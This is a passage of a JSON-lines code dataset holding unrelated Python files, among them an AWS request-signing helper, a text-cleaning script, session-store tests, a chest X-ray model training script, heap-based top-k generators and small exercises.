Credentials(\n os.environ[\"AWS_ACCESS_KEY_ID\"],\n os.environ[\"AWS_SECRET_ACCESS_KEY\"],\n os.environ[\"AWS_SESSION_TOKEN\"])\n\n\ndef _create_url(host, path, ssl=False):\n if not path.startswith(\"/\"):\n path = \"/\" + path\n\n if ssl:\n return \"https://\" + host + path\n else:\n return \"http://\" + host + path\n\n\ndef request(url, method, credentials, service_name, region=None, headers=None, data=None):\n if not region:\n region = os.environ[\"AWS_REGION\"]\n\n aws_request = AWSRequest(url=url, method=method, headers=headers, data=data)\n SigV4Auth(credentials, service_name, region).add_auth(aws_request)\n return PreserveAuthSession().send(aws_request.prepare())\n\n\ndef es_request(url, method, credentials, region=None, headers=None, data=None):\n return request(url, method, credentials, \"es\", region, headers, data)\n","sub_path":"lambda/s3_to_es/s3_to_es.py","file_name":"s3_to_es.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100362840","text":"\"\"\"\nScript to clean the PAN20 Fanfiction dataset.\nExecutes the following steps:\n - Remove tokens longer than 23 characters\n - Remove tokens with 3 or more punctuation symbols (37510 types)\n - Remove tokens containing symbols that are not in transcribable_ff or punctuation\n - Replace \" with ' (\" does not transcribe, ' does)\n - Remove excessively long or short texts\nPersists the cleaned dataset to a new folder also containing a corrected truth file.\n\"\"\"\nfrom string import punctuation\nimport re\n\nimport spacy\n\n# Contains lowercase characters that g2p_en can transcribe directly\ntranscribable_ff_lowercase = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n 'i', 'j',\n 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'à', 'á',\n 'â', 'ã',\n 'ä', 'å', 'ç', 'è', 'é', 'ê', 'ë', 'ì', 'í', 'î', 'ï', 'ñ', 'ò', 'ó', 'ô', 'õ', 'ö', 'ù',\n 'ú', 'û',\n 'ü', 'ý', 'ÿ', 'ā', 'ă', 'ą', 'ć', 'ĉ', 'č', 'ď', 'ē', 'ĕ', 'ė', 'ę', 'ě', 'ĝ', 'ğ', 'ġ',\n 'ĥ', 'ī',\n 'ĭ', 'į', 'ĺ', 'ļ', 'ľ', 'ń', 'ņ', 'ň', 'ō', 'ŏ', 'ő', 'ŕ', 'ŗ', 'ř', 'ś', 'ŝ', 'ş', 'š',\n 'ţ', 'ť',\n 'ũ', 'ū', 'ŭ', 'ů', 'ű', 'ų', 'ŵ', 'ŷ', 'ź', 'ż', 'ž', 'ơ', 'ư', 'ǎ', 'ǐ', 'ǒ', 'ǔ', 'ǘ',\n 'ǧ', 'ǫ',\n 'ǵ', 'ǹ', 'ǻ', 'ȁ', 'ȅ', 'ȇ', 'ȉ', 'ȋ', 'ȍ', 'ȏ', 'ȓ', 'ș', 'ț', 'ȟ', 'ȧ', 'ȩ', 'ȫ', 'ȯ',\n 'ȳ', 'ḁ',\n 'ḋ', 'ḍ', 'ḑ', 'ḓ', 'ḙ', 'ḛ', 'ḣ', 'ḥ', 'ḧ', 'ḩ', 'ḫ', 'ḭ', 'ḯ', 'ḷ', 'ḻ', 'ḽ', 'ḿ', 'ṁ',\n 'ṃ', 'ṅ',\n 'ṇ', 'ṛ', 'ṟ', 'ṡ', 'ṣ', 'ṩ', 'ṫ', 'ṭ', 'ṯ', 'ṱ', 'ṳ', 'ṷ', 'ṻ', 'ṽ', 'ṿ', 'ẁ', 'ẃ', 'ẇ',\n 'ẍ', 'ẖ',\n 'ẗ', 'ẘ', 'ạ', 'ầ', 'ậ', 'ẹ', 'ẻ', 'ẽ', 'ế', 'ị', 'ọ', 'ỏ', 'ộ', 'ớ', 'ờ', 'ở', 'ủ', 'ỳ',\n 'ỵ', 'ỷ']\ntranscribable = transcribable_ff_lowercase + list(punctuation)\n\nnlp = spacy.load('en_core_web_sm', exclude=['parser', 'ner'])\n\n\ndef clean(doc):\n return ''.join([x.text_with_ws for x in doc if clean_cond(x)])\n\n\ndef clean_cond(token):\n return all(c in transcribable for c in token.text.lower()) and len(token.text) <= 23 and len([c for c in token.text if c in punctuation]) <= 2\n\n\ndef replace_special(text):\n return text.replace('\"', \"'\").replace('...', '. ')\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"clean_ff.py","file_name":"clean_ff.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157582585","text":"import json\nfrom datetime import datetime, timedelta\n\nfrom flask import current_app\nfrom jwcrypto import jwe\nfrom jwcrypto.common import base64url_encode\n\nfrom app.data_models.app_models import EQSession\nfrom app.data_models.session_data import SessionData\nfrom app.data_models.session_store import SessionStore\nfrom app.storage import storage_encryption\nfrom app.utilities.json import json_dumps\nfrom tests.app.app_context_test_case import AppContextTestCase\n\n\nclass SessionStoreTest(AppContextTestCase):\n def setUp(self):\n super().setUp()\n self._app.permanent_session_lifetime = timedelta(seconds=1)\n self.session_store = SessionStore(\"user_ik\", \"pepper\")\n self.expires_at = datetime.utcnow() + timedelta(seconds=3)\n self.session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n\n def test_no_session(self):\n with self._app.test_request_context():\n self.assertIsNone(self.session_store.user_id)\n self.assertIsNone(self.session_store.session_data)\n\n def test_create(self):\n with self._app.test_request_context():\n self.session_store.create(\n \"eq_session_id\", \"test\", self.session_data, self.expires_at\n )\n self.assertEqual(\"eq_session_id\", self.session_store.eq_session_id)\n self.assertEqual(\"test\", self.session_store.user_id)\n self.assertEqual(self.session_data, self.session_store.session_data)\n\n def test_save(self):\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n self.assertEqual(session_store.session_data.tx_id, \"tx_id\")\n\n def test_delete(self):\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n self.assertEqual(\"test\", self.session_store.user_id)\n self.session_store.delete()\n self.assertEqual(self.session_store.user_id, None)\n\n def test_add_data_to_session(self):\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n current_time = datetime.utcnow().isoformat()\n self.session_store.session_data.submitted_time = current_time\n self.session_store.save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n self.assertEqual(session_store.session_data.submitted_time, current_time)\n\n def test_should_not_delete_when_no_session(self):\n with self.app_request_context(\"/status\") as context:\n\n # Call clear with a valid user_id but no session in database\n self.session_store.delete()\n\n # No database calls should have been made\n self.assertEqual(context.app.eq[\"storage\"].client.delete_call_count, 0)\n\n def test_session_store_ignores_new_values_in_session_data(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n\n session_data.additional_value = \"some cool new value you do not know about yet\"\n\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertFalse(hasattr(session_store.session_data, \"additional_value\"))\n\n def test_session_store_ignores_multiple_new_values_in_session_data(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n\n session_data.additional_value = \"some cool new value you do not know about yet\"\n session_data.second_additional_value = \"some other not so cool value\"\n\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertFalse(hasattr(session_store.session_data, \"additional_value\"))\n self.assertFalse(\n hasattr(session_store.session_data, \"second_additional_value\")\n )\n\n def test_session_store_stores_trading_as_value_if_present(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n trad_as=\"trading_as\",\n case_id=\"case_id\",\n )\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertTrue(hasattr(session_store.session_data, \"trad_as\"))\n\n def test_session_store_stores_none_for_trading_as_if_not_present(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertIsNone(session_store.session_data.trad_as)\n\n\nclass TestSessionStoreEncoding(AppContextTestCase):\n \"\"\"Session data used to be base64-encoded. For performance reasons the\n base64 encoding was removed.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.user_id = \"user_id\"\n self.user_ik = \"user_ik\"\n self.pepper = \"pepper\"\n self.session_id = \"session_id\"\n self.expires_at = datetime.utcnow() + timedelta(seconds=3)\n self.session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n response_id=\"response_id\",\n ru_ref=\"ru_ref\",\n trad_as=\"trading_as_name\",\n case_id=\"case_id\",\n )\n\n # pylint: disable=protected-access\n self.key = storage_encryption.StorageEncryption._generate_key(\n self.user_id, self.user_ik, self.pepper\n )\n\n def test_legacy_load(self):\n self._save_session(\n self.session_id, self.user_id, self.session_data, legacy=True\n )\n session_store = SessionStore(self.user_ik, self.pepper, self.session_id)\n self.assertEqual(session_store.session_data.tx_id, self.session_data.tx_id)\n\n def test_load(self):\n self._save_session(self.session_id, self.user_id, self.session_data)\n session_store = SessionStore(self.user_ik, self.pepper, self.session_id)\n self.assertEqual(session_store.session_data.tx_id, self.session_data.tx_id)\n\n def _save_session(self, session_id, user_id, data, legacy=False):\n raw_data = json_dumps(vars(data))\n protected_header = {\"alg\": \"dir\", \"enc\": \"A256GCM\", \"kid\": \"1,1\"}\n\n if legacy:\n plaintext = base64url_encode(raw_data)\n else:\n plaintext = raw_data\n\n jwe_token = jwe.JWE(\n plaintext=plaintext, protected=protected_header, recipient=self.key\n )\n\n session_model = EQSession(\n eq_session_id=session_id,\n user_id=user_id,\n session_data=jwe_token.serialize(compact=True),\n expires_at=self.expires_at,\n )\n current_app.eq[\"storage\"].put(session_model)\n","sub_path":"tests/app/data_model/test_session_store.py","file_name":"test_session_store.py","file_ext":"py","file_size_in_byte":9995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323409881","text":"import cv2\nimport numpy as np\n\nfrom cv_viewer.utils import *\nimport pyzed.sl as sl\n\n#----------------------------------------------------------------------\n# 2D VIEW\n#----------------------------------------------------------------------\ndef cvt(pt, scale):\n '''\n Function that scales point coordinates\n '''\n out = [pt[0]*scale[0], pt[1]*scale[1]]\n return out\n\ndef render_2D(left_display, img_scale, objects, is_tracking_on):\n '''\n Parameters\n left_display (np.array): numpy array containing image data\n img_scale (list[float])\n objects (list[sl.ObjectData]) \n '''\n overlay = left_display.copy()\n\n # Render skeleton joints and bones\n for obj in objects:\n if render_object(obj, is_tracking_on):\n if len(obj.keypoint_2d) > 0:\n color = generate_color_id_u(obj.id)\n # Draw skeleton bones\n for part in SKELETON_BONES:\n kp_a = cvt(obj.keypoint_2d[part[0].value], img_scale)\n kp_b = cvt(obj.keypoint_2d[part[1].value], img_scale)\n # Check that the keypoints are inside the image\n if(kp_a[0] < left_display.shape[1] and kp_a[1] < left_display.shape[0] \n and kp_b[0] < left_display.shape[1] and kp_b[1] < left_display.shape[0]\n and kp_a[0] > 0 and kp_a[1] > 0 and kp_b[0] > 0 and kp_b[1] > 0 ):\n cv2.line(left_display, (int(kp_a[0]), int(kp_a[1])), (int(kp_b[0]), int(kp_b[1])), color, 1, cv2.LINE_AA)\n \n # Get spine base coordinates to create backbone\n left_hip = obj.keypoint_2d[sl.BODY_PARTS.LEFT_HIP.value]\n right_hip = obj.keypoint_2d[sl.BODY_PARTS.RIGHT_HIP.value]\n spine = (left_hip + right_hip) / 2\n kp_spine = cvt(spine, img_scale)\n kp_neck = cvt(obj.keypoint_2d[sl.BODY_PARTS.NECK.value], img_scale)\n # Check that the keypoints are inside the image\n if(kp_spine[0] < left_display.shape[1] and kp_spine[1] < left_display.shape[0] \n and kp_neck[0] < left_display.shape[1] and kp_neck[1] < left_display.shape[0]\n and kp_spine[0] > 0 and kp_spine[1] > 0 and kp_neck[0] > 0 and kp_neck[1] > 0\n and left_hip[0] > 0 and left_hip[1] > 0 and right_hip[0] > 0 and right_hip[1] > 0 ):\n cv2.line(left_display, (int(kp_spine[0]), int(kp_spine[1])), (int(kp_neck[0]), int(kp_neck[1])), color, 1, cv2.LINE_AA)\n\n # Skeleton joints\n for kp in obj.keypoint_2d:\n cv_kp = cvt(kp, img_scale)\n if(cv_kp[0] < left_display.shape[1] and cv_kp[1] < left_display.shape[0]):\n cv2.circle(left_display, (int(cv_kp[0]), int(cv_kp[1])), 3, color, -1)\n if(kp_spine[0] < left_display.shape[1] and kp_spine[1] < left_display.shape[0]\n and left_hip[0] > 0 and left_hip[1] > 0 and right_hip[0] > 0 and right_hip[1] > 0 ):\n cv2.circle(left_display, (int(kp_spine[0]), int(kp_spine[1])), 3, color, -1)\n \n cv2.addWeighted(left_display, 0.9, overlay, 0.1, 0.0, left_display)","sub_path":"body tracking/python/cv_viewer/tracking_viewer.py","file_name":"tracking_viewer.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601163913","text":"def is_leap(year):\n if year % 4 == 0:\n if year % 100 == 0:\n if year % 400 == 0:\n print(\"Leap year.\")\n return True\n else:\n print(\"Not leap year.\")\n return False\n else:\n print(\"Leap year.\")\n return True\n else:\n print(\"Not leap year.\")\n return False\n\ndef days_in_month(year, month):\n month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n leap_year = is_leap(year)\n if month == 2:\n if leap_year == True:\n return month_days[month-1]+1\n return month_days[month-1] \n \n \n \n#🚨 Do NOT change any of the code below \nyear = int(input(\"Enter a year: \"))\nmonth = int(input(\"Enter a month: \"))\ndays = days_in_month(year, month)\nprint(days)\n\n","sub_path":"is_leap_year.py","file_name":"is_leap_year.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68136694","text":"#! /usr/bin/env python\n#coding=utf-8\n\nfrom apis.contact.department.depmanagment import DeptManagment\n\nclass TestCreateDep:\n\n def test_create_new_dep(self):\n dept_managment = DeptManagment()\n dept_managment.create_dept()\n create_res = dept_managment.get_response()\n assert create_res.get('errmsg')=='created'","sub_path":"qiyeweixin/src/testcases/contact/department/test_create_dep.py","file_name":"test_create_dep.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639637988","text":"import os\nimport time\nimport argparse\nimport numpy as np\n\nlistdir = os.getcwd()\nos.chdir(os.path.dirname(listdir))\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\n\nfrom tensorboardX import SummaryWriter\nfrom sklearn.metrics import roc_auc_score\nfrom chestx.models import densenet121_chest\nfrom chestx.nih import ChestXrayDataSet\nfrom chestx.loss import FocalLoss, MultiLabelBCELoss\n\nparser = argparse.ArgumentParser(description='Chest-Xray Training')\nparser.add_argument('--data_path', type=str,\n default='./CVPR19/',\n help='folder to load labels and images')\nparser.add_argument('--save_path', type=str,\n default='./chestx/logs4/',\n help='folder to save output images and model checkpoints')\nparser.add_argument('--image_size', type=int,\n default=512,\n help='image size (default: 512)')\nparser.add_argument('--lr', '--learning_rate', type=float,\n default=1e-2,\n help='initial learning rate (default: 0.01)')\nparser.add_argument('--lrp', type=float,\n default=0.1,\n help='learning rate for pre-trained layers (default: 0.1)')\nparser.add_argument('--momentum', type=float,\n default=0.9,\n help='momentum (default: 0.9)')\nparser.add_argument('--epochs', type=int,\n default=40,\n help='umber of total epochs to run')\nparser.add_argument('--batch_size', type=int,\n default=15,\n help='batch size for training model')\nparser.add_argument('--test_batch_size', type=int,\n default=3,\n help='batch size for testing model')\nparser.add_argument('--weight-decay', type=float,\n default=1e-4,\n help='weight decay (default: 1e-5)')\nparser.add_argument('--num_classes', type=int,\n default=14,\n help='The numbers of classes')\nparser.add_argument('--normalize_mean', type=tuple,\n default=(0.5, 0.5, 0.5),\n help='mean value for image normalization')\nparser.add_argument('--normalize_var', type=tuple,\n default=(0.5, 0.5, 0.5),\n help='variance value for image normalization')\nparser.add_argument('--classes', type=tuple,\n default=('Atelectasis', 'Cardiomegaly', 'Effusion', 'Infiltration', 'Mass', 'Nodule', 'Pneumonia',\n 'Pneumothorax', 'Consolidation', 'Edema', 'Emphysema', 'Fibrosis', 'Pleural_Thickening', 'Hernia'),\n help='labels of Chest-Xray')\nargs = parser.parse_args()\n\n# Define to use GPU0\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef compute_AUCs(gt_np, pred_np):\n AUROCs = []\n for i in range(args.num_classes):\n AUROCs.append(roc_auc_score(gt_np[:, i], pred_np[:, i]))\n return AUROCs\n\ndef main_chest():\n print('222')\n # Preparing for Dataset\n transform_train = transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.RandomCrop(448),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(args.normalize_mean, args.normalize_var)\n ])\n\n transform_test = transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.FiveCrop(448),\n transforms.Lambda(lambda crops: torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n # transforms.Normalize(args.normalize_mean, args.normalize_var),\n transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize(args.normalize_mean, args.normalize_var)(crop) for crop in crops])),\n ])\n\n print('Preparing training set...')\n trainset = ChestXrayDataSet(root=args.data_path, set=\"train\", transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size,\n shuffle=True, num_workers=2)\n trainloader2 = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size,\n shuffle=True, num_workers=2)\n\n print('Preparing testing set...')\n testset = ChestXrayDataSet(root=args.data_path, set=\"test\", transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size,\n shuffle=False, num_workers=2)\n print('Dataset loading is done!')\n\n # Define Chest-Xray model\n net = densenet121_chest(num_classes=args.num_classes, kmax=5, kmin=5, alpha=0.7).to(device)\n\n # Define Loss function and Optimizer\n criterion = MultiLabelBCELoss()\n #criterion = FocalLoss()\n criterion = criterion.to(device)\n optimizer = torch.optim.SGD(net.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[9, 12, 15], gamma=0.1)\n # scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.1)\n\n state = {'train_time':time.time(), 'test_time':time.time(), 'step':0,\n 'learning_rate':scheduler.get_lr()[0], 'sum_loss':0.,}\n writer = SummaryWriter(args.save_path)\n # net.load_state_dict(torch.load('./chestx/logs5/model_1.pth'))\n\n # Training\n print(\"Staring Training ...\")\n for epoch in range(1, args.epochs + 1):\n # if epoch >= 5:\n scheduler.step()\n for i, (inputs, labels) in enumerate(trainloader, 0):\n net.train()\n length = len(trainloader)\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n state['sum_loss'] += loss.data.item()\n state['step'] += 1\n if (i + 1) % 10 == 0:\n writer.add_scalar('Loss', loss.data.item(), (i + 1 + epoch * length))\n if (i + 1) % 1000 == 0:\n state['learning_rate'] = np.log10(1 / scheduler.get_lr()[0]).astype(int)\n print('[epoch : {}, iter : {}, lr : 1e-{}] Loss: {:.3f} Cost Time : {:.2f}'.format(\n epoch, (i + 1 + (epoch - 1) * length), state['learning_rate'],\n state['sum_loss'] / state['step'], time.time() - state['train_time']))\n state['sum_loss'], state['step'], state['train_time'] = 0., 0, time.time()\n\n print(\"Waiting for Test...\")\n state['test_time'] = time.time()\n with torch.no_grad():\n gt, pred = torch.FloatTensor(), torch.FloatTensor()\n for (inputs, labels) in testloader:\n inputs = inputs.view([args.test_batch_size * 5, 3, 448, 448])\n\n net.eval()\n gt = torch.cat((gt, labels), 0)\n inputs = inputs.to(device)\n outputs = net(inputs)\n outputs = outputs.view([args.test_batch_size, 5, args.num_classes]).max(dim=1)[0]\n pred = torch.cat((pred, outputs.cpu()), 0)\n\n gt_npy = gt.cpu().numpy()\n pred_npy = pred.cpu().numpy()\n AUROCs = compute_AUCs(gt_npy, pred_npy)\n AUROC_avg = np.array(AUROCs).mean()\n print('The average AUROC is {AUROC_avg:.4f}'.format(AUROC_avg=AUROC_avg))\n for idx in range(args.num_classes):\n print('The AUROC of {} is {}'.format(args.classes[idx], AUROCs[idx]))\n print('Testing cost time : {:.2f}'.format(time.time() - state['test_time']))\n state['train_time'] = state['test_time'] = time.time()\n\n writer.add_scalar('AUROC', AUROC_avg, epoch)\n\n print(\"Saving model...\")\n torch.save(net.state_dict(), '{}/model_{}.pth'.format(args.save_path, epoch))\n\n\nif __name__ == '__main__':\n main_chest()","sub_path":"demo_chest.py","file_name":"demo_chest.py","file_ext":"py","file_size_in_byte":8129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119655059","text":"import random\nimport time\nimport datetime\n\ndef data_source():\n while True:\n yield random.randint(0, 100)\n time.sleep(0.1)\n\ndef top_k1(k, time=3):\n start = datetime.datetime.now()\n lst = []\n ds = data_source()\n while True:\n lst.append(next(ds))\n current = datetime.datetime.now()\n if (current - start).total_seconds() >= time:\n start = current\n lst.sort()\n ret = []\n for _ in range(k):\n ret.append(lst.pop())\n yield ret\n\ndef top_k2(k, time=3):\n start = datetime.datetime.now()\n lst = []\n ds = data_source()\n while True:\n #lst.append(next(ds))\n e = next(ds)\n for i, v in enumerate(lst):\n if e < v:\n lst.insert(i, e)\n break\n else:\n lst.append(e)\n current = datetime.datetime.now()\n if (current - start).total_seconds() >= time:\n start = current\n #lst.sort()\n ret = []\n for _ in range(k):\n ret.append(lst.pop())\n yield ret\n\n\ndef heap():\n data = []\n\n def add(e):\n idx = len(data)\n data.append(e)\n parent_idx = (idx - 1) // 2\n while parent_idx >= 0:\n if data[idx] > data[parent_idx]:\n data[parent_idx], data[idx] = data[idx], data[parent_idx]\n idx = parent_idx\n parent_idx = (idx - 1) // 2\n else:\n break\n\n def pop():\n if not data:\n return None\n if len(data) == 1:\n return data.pop()\n idx = 0\n ret = data[idx]\n data[idx] = data.pop()\n left_idx = 2 * idx + 1\n rigth_idx = left_idx + 1\n while left_idx < len(data):\n child_idx = left_idx\n if rigth_idx < len(data) and data[rigth_idx] > data[left_idx]: # 存在右子节点 并且 右子节点大于左子节点\n child_idx = rigth_idx\n if data[idx] < data[child_idx]:\n data[idx], data[child_idx] = data[child_idx], data[idx]\n idx = child_idx\n left_idx = 2 * idx + 1\n rigth_idx = left_idx + 1\n else:\n break\n return ret\n\n return add, pop\n\ndef top_k3(k, time=3):\n start = datetime.datetime.now()\n add, pop = heap()\n ds = data_source()\n while True:\n add(next(ds))\n current = datetime.datetime.now()\n if (current - start).total_seconds() >= time:\n start = current\n ret = []\n for _ in range(k):\n ret.append(pop())\n yield ret\n\nif __name__ == \"__main__\":\n g = top_k3(10)\n for _ in range(3):\n print(next(g))","sub_path":"Find Max Number in Random.py","file_name":"Find Max Number in Random.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160878856","text":"\n\n# The simplest way to concatenate list1 and list2:\n# merged = list1 + list2\n\n\n# zip returns a list of tuples, where the i-th tuple contains the i-th element from each of the argument\n# sequences or iterables:\nimport itertools\nalist = ['a1', 'a2', 'a3']\nblist = ['b1', 'b2', 'b3']\nfor a, b in zip(alist, blist):\n print(a, b)\n# Output:\n# a1 b1\n# a2 b2\n# a3 b3\n\nprint(\"---\")\n# If the lists have different lengths then the result will include only as many elements as the shortest one:\nalist = ['a1', 'a2', 'a3']\nblist = ['b1', 'b2', 'b3', 'b4']\nfor a, b in zip(alist, blist):\n print(a, b)\n# Output:\n# a1 b1\n# a2 b2\n# a3 b3\nalist = []\nlen(list(zip(alist, blist)))\n# Output:\n# 0\n\nprint(\"---\")\n# For padding lists of unequal length to the longest one with Nones use itertools.zip_longest\n# (itertools.izip_longest in Python 2)\nalist = ['a1', 'a2', 'a3']\nblist = ['b1']\nclist = ['c1', 'c2', 'c3', 'c4']\nfor a, b, c in itertools.zip_longest(alist, blist, clist):\n print(a, b, c)\n# Output:\n# a1 b1 c1\n# a2 None c2\n# a3 None c3\n# None None c4\n\n\n# Insert to a specific index values:\nalist = [123, 'xyz', 'zara', 'abc']\nalist.insert(3, [2009])\nprint(\"Final List :\", alist)\n# Output:\n# Final List: [123, 'xyz', 'zara', 2009, 'abc']\n","sub_path":"Chapter 20 List/20_8_Concatenate_and_Merge_lists.py","file_name":"20_8_Concatenate_and_Merge_lists.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116744589","text":"import random\n\nfrom tests.utils import async_test\nfrom donphan import Column, Table, SQLType\nfrom unittest import TestCase\n\n\nNUM_ITEMS = random.randint(3, 10)\n\n\nclass _TestTable(Table):\n a: Column[SQLType.Integer] = Column(primary_key=True)\n\n\nclass ViewTest(TestCase):\n def test_query_create(self):\n self.assertEqual(\n _TestTable._query_create(True),\n \"CREATE TABLE IF NOT EXISTS public.__test_table ( a INTEGER , PRIMARY KEY ( a ) )\",\n )\n\n def test_query_fetch_in(self):\n where = _TestTable._build_where_clause({\"a__in\": (1, 2, 3)})\n\n self.assertEqual(\n _TestTable._build_query_fetch(where, None, None),\n \"SELECT * FROM public.__test_table WHERE a = any($1::INTEGER[])\",\n )\n\n @async_test\n async def test_a_table_create(self):\n await _TestTable.create(None)\n\n @async_test\n async def test_b_table_insert(self):\n for x in range(NUM_ITEMS):\n await _TestTable.insert(None, a=x)\n\n @async_test\n async def test_c_table_fetch(self):\n records = list(await _TestTable.fetch(None))\n self.assertEqual(len(records), NUM_ITEMS)\n\n @async_test\n async def test_d_table_insert_returning(self):\n record = await _TestTable.insert(None, a=10, returning=\"*\")\n self.assertEqual(record[\"a\"], 10)\n\n record = await _TestTable.insert(None, a=11, returning=[\"a\"])\n self.assertEqual(record[\"a\"], 11)\n\n record = await _TestTable.insert(None, a=12, returning=[_TestTable.a])\n self.assertEqual(record[\"a\"], 12)\n\n @async_test\n async def test_e_table_fetch_in(self):\n records = await _TestTable.fetch(None, a__in=(10, 11, 12, 13))\n self.assertEqual(len(list(records)), 3)\n\n @async_test\n async def test_f_table_delete(self):\n await _TestTable.drop(None)\n","sub_path":"tests/test_d_table.py","file_name":"test_d_table.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258259991","text":"@classmethod\ndef _string_to_dict(cls, string):\n # string = 'document.cpf IS not_empty AND more_than:50 OR less_than:45 OR between:60,65'\n string = string.split('IS')\n field = string[0].strip()\n\n def extract_condition_or(condition):\n condition = condition.split('OR')\n return list(map(lambda c: c.strip(), condition))\n\n def extract_condition_and(condition):\n condition = condition.split('AND')\n return list(map(lambda c: extract_args(c), condition))\n\n def extract_args(condition):\n condition = condition.split(':')\n\n field = condition[0].strip()\n args = condition[1].split(',') if len(condition) == 2 else []\n args = list(map(lambda c: c.strip(), args))\n return {\"{}\".format(field): args}\n\n condition = extract_condition_or(string[1])\n condition = list(map(lambda c: extract_condition_and(c), condition))\n \n \ndef condition_to_dict(condition):\n dict = 